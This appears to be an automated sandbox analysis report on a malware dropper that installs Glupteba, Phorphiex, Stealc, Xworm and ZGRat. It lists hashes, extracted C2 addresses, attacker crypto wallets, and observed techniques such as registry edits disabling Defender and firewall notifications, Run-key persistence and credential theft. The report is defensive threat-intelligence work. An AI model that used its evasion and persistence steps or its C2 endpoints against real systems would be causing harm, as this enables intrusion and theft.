glupteba | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

09-04-2024 08:32

240409-kfg77aaf85 10

09-04-2024 08:32

09-04-2024 08:32

09-04-2024 08:32

11-03-2024 08:03

10-03-2024 15:15

Analysis

max time kernel
88s
max time network
544s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
09-04-2024 08:32

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

FUCKER.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

glupteba phorphiex stealc xworm zgrat discovery dropper evasion loader persistence rat spyware stealer trojan worm

Malware Config

Extracted

Family

xworm

91.92.249.37:9049

Mutex

aMtkXNimPlkESDx9

aes.plain

Extracted

Family

phorphiex

http://185.215.113.66/

Wallets

0xAa3ea4838e8E3F6a1922c6B67E3cD6efD1ff175b

THRUoPK7oYqF7YyKZJvPYwTH35JsPZVPto

1Hw9tx4KyTq4oRoLVhPb4hjDJcLhEa4Tn6

qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut

XtxFdsKkRN3oVDXtN2ipcHeNi87basT2sL

LXMNcn9D8FQKzGNLjdSyR9dEM8Rsh9NzyX

rwn7tb5KQjXEjH42GgdHWHec5PPhVgqhSH

ARML6g7zynrwUHJbFJCCzMPiysUFXYBGgQ

48jYpFT6bT8MTeph7VsyzCQeDsGHqdQNc2kUkRFJPzfRHHjarBvBtudPUtParMkDzZbYBrd3yntWBQcsnVBNeeMbN9EXifg

3PL7YCa4akNYzuScqQwiSbtTP9q9E9PLreC

3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3

D9AJWrbYsidS9rAU146ifLRu1fzX9oQYSH

t1gvVWHnjbGTsoWXEyoTFojc2GqEzBgvbEn

bnb1cgttf7t5hu7ud3c436ufhcmy59qnkd09adqczd

bc1q0fusmmgycnhsd5cadsuz2hk8d4maausjfjypqg

bitcoincash:qr89hag2967ef604ud3lw4pq8hmn69n46czwdnx3ut

GAUCC7ZBSU2KJMHXOZD6AP5LOBGKNDPCDNRYP2CO2ACR63YCSUBNT5QE

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Files\first.exe	family_xworm
behavioral1/memory/1872-538-0x0000000001150000-0x0000000001166000-memory.dmp	family_xworm

Detect ZGRat V1 21 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1512-189-0x0000000004500000-0x00000000045DC000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-190-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-191-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-193-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-195-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-197-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-199-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-201-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-203-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-205-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-207-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-209-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-213-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-211-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-215-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-219-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
behavioral1/memory/1512-217-0x0000000004500000-0x00000000045D6000-memory.dmp	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe	family_zgrat_v1
behavioral1/memory/2716-685-0x00000000012A0000-0x00000000017A4000-memory.dmp	family_zgrat_v1
behavioral1/memory/984-790-0x0000000000870000-0x0000000000D74000-memory.dmp	family_zgrat_v1
C:\Program Files\Microsoft Office\Office14\winvnc.exe	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 7 IoCs

Processes:

resource	yara_rule
behavioral1/memory/540-157-0x0000000004160000-0x0000000004A4B000-memory.dmp	family_glupteba
behavioral1/memory/540-161-0x0000000000400000-0x00000000022E9000-memory.dmp	family_glupteba
behavioral1/memory/540-587-0x0000000000400000-0x00000000022E9000-memory.dmp	family_glupteba
behavioral1/memory/2564-605-0x0000000004060000-0x000000000494B000-memory.dmp	family_glupteba
behavioral1/memory/2564-606-0x0000000000400000-0x00000000022E9000-memory.dmp	family_glupteba
behavioral1/memory/2564-698-0x0000000000400000-0x00000000022E9000-memory.dmp	family_glupteba
behavioral1/memory/2452-715-0x0000000000400000-0x00000000022E9000-memory.dmp	family_glupteba

Phorphiex
Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Stealc
Stealc is an infostealer written in C++.
stealer stealc

Windows security bypass 2 TTPs 25 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

2089531801.exed21cbe21e38b385a41a68c5e6dd32f4c.exe350630453.exe208925959.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	2089531801.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	350630453.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	2089531801.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	2089531801.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	350630453.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	208925959.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	350630453.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	350630453.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	208925959.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	2089531801.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	2089531801.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	208925959.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	208925959.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	350630453.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	350630453.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	2089531801.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	208925959.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	208925959.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
2436	bcdedit.exe
1704	bcdedit.exe
2272	bcdedit.exe
1072	bcdedit.exe
692	bcdedit.exe
3900	bcdedit.exe
2356	bcdedit.exe
1968	bcdedit.exe
3740	bcdedit.exe
3268	bcdedit.exe
1788	bcdedit.exe
3160	bcdedit.exe
1104	bcdedit.exe
3272	bcdedit.exe

Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

456 netsh.exe
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

pid	process
456	netsh.exe

Drops startup file 2 IoCs

Processes:

first.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe	first.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe	first.exe

Executes dropped EXE 18 IoCs

Processes:

syncUpd.exeISetup10.exed21cbe21e38b385a41a68c5e6dd32f4c.exeappdata.exefirst.exepinf.exeswiiii.exed21cbe21e38b385a41a68c5e6dd32f4c.exe2089531801.exeFCBAEHCAEG.exema.exe350630453.execsrss.exe208925959.exeriviera_tour_sochi.pdf.exeelevator.exe.exe2191930072.exe

pid	process
1984	syncUpd.exe
1704	ISetup10.exe
540	d21cbe21e38b385a41a68c5e6dd32f4c.exe
1608	appdata.exe
1872	first.exe
2852	pinf.exe
948	swiiii.exe
2564	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2740	2089531801.exe
3060	FCBAEHCAEG.exe
2716	ma.exe
2692	350630453.exe
2452	csrss.exe
2612	208925959.exe
2204	riviera_tour_sochi.pdf.exe
2060	elevator.exe
984	.exe
1776	2191930072.exe

Loads dropped DLL 30 IoCs

Processes:

FUCKER.exesyncUpd.exepinf.execmd.exe2089531801.exed21cbe21e38b385a41a68c5e6dd32f4c.execmd.exe350630453.exe

pid	process
2040	FUCKER.exe
2040	FUCKER.exe
2040	FUCKER.exe
2040	FUCKER.exe
2040	FUCKER.exe
2040	FUCKER.exe
1984	syncUpd.exe
1984	syncUpd.exe
2040	FUCKER.exe
2040	FUCKER.exe
2040	FUCKER.exe
2852	pinf.exe
2852	pinf.exe
572	cmd.exe
2040	FUCKER.exe
2040	FUCKER.exe
2740	2089531801.exe
2740	2089531801.exe
2564	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2564	d21cbe21e38b385a41a68c5e6dd32f4c.exe
2740	2089531801.exe
2040	FUCKER.exe
2040	FUCKER.exe
2040	FUCKER.exe
2780	cmd.exe
2780	cmd.exe
2692	350630453.exe
2692	350630453.exe
1128
2740	2089531801.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Windows security modification 2 TTPs 28 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

350630453.exe208925959.exed21cbe21e38b385a41a68c5e6dd32f4c.exe2089531801.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	350630453.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	208925959.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	350630453.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	208925959.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	208925959.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	2089531801.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	350630453.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	350630453.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	208925959.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	2089531801.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	2089531801.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	208925959.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	2089531801.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	2089531801.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	2089531801.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	350630453.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	2089531801.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	208925959.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	350630453.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	350630453.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	208925959.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

350630453.exe208925959.exefirst.exe2089531801.exed21cbe21e38b385a41a68c5e6dd32f4c.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\syspplsvc.exe"	350630453.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winakrosvsa.exe"	208925959.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Users\\Admin\\winakrosvsa.exe"	208925959.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\first = "C:\\Users\\Admin\\AppData\\Roaming\\first.exe"	first.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysdinrdvs.exe"	2089531801.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysdinrdvs.exe"	2089531801.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syspplsvc.exe"	350630453.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

24 raw.githubusercontent.com
25 raw.githubusercontent.com
382 bitbucket.org
383 bitbucket.org
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

32 ip-api.com

flow	ioc
24	raw.githubusercontent.com
25	raw.githubusercontent.com
382	bitbucket.org
383	bitbucket.org

flow	ioc
32	ip-api.com

Suspicious use of SetThreadContext 2 IoCs

Processes:

appdata.exeswiiii.exe

description	pid	process	target process
PID 1608 set thread context of 1512	1608	appdata.exe	RegAsm.exe
PID 948 set thread context of 2080	948	swiiii.exe	RegAsm.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

d21cbe21e38b385a41a68c5e6dd32f4c.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN d21cbe21e38b385a41a68c5e6dd32f4c.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	d21cbe21e38b385a41a68c5e6dd32f4c.exe

Drops file in Windows directory 9 IoCs

Processes:

d21cbe21e38b385a41a68c5e6dd32f4c.exe350630453.exe208925959.exe2089531801.exemakecab.exe

description	ioc	process
File opened for modification	C:\Windows\rss	d21cbe21e38b385a41a68c5e6dd32f4c.exe
File created	C:\Windows\syspplsvc.exe	350630453.exe
File opened for modification	C:\Windows\winakrosvsa.exe	208925959.exe
File created	C:\Windows\sysdinrdvs.exe	2089531801.exe
File opened for modification	C:\Windows\sysdinrdvs.exe	2089531801.exe
File opened for modification	C:\Windows\syspplsvc.exe	350630453.exe
File created	C:\Windows\winakrosvsa.exe	208925959.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240409103423.cab	makecab.exe
File created	C:\Windows\rss\csrss.exe	d21cbe21e38b385a41a68c5e6dd32f4c.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

1828 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1828	sc.exe

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2464	2080	WerFault.exe	RegAsm.exe
4028	3736	WerFault.exe	crypted_33cb9091.exe
2232	2860	WerFault.exe	LummaC2.exe
752	2000	WerFault.exe	Violator.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

syncUpd.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	syncUpd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	syncUpd.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2584 schtasks.exe
1672 schtasks.exe
1380 schtasks.exe
3060 schtasks.exe
1992 schtasks.exe
2684 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2576 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

2772 tasklist.exe
3816 tasklist.exe

pid	process
2584	schtasks.exe
1672	schtasks.exe
1380	schtasks.exe
3060	schtasks.exe
1992	schtasks.exe
2684	schtasks.exe

pid	process
2576	timeout.exe

pid	process
2772	tasklist.exe
3816	tasklist.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

d21cbe21e38b385a41a68c5e6dd32f4c.exenetsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	d21cbe21e38b385a41a68c5e6dd32f4c.exe
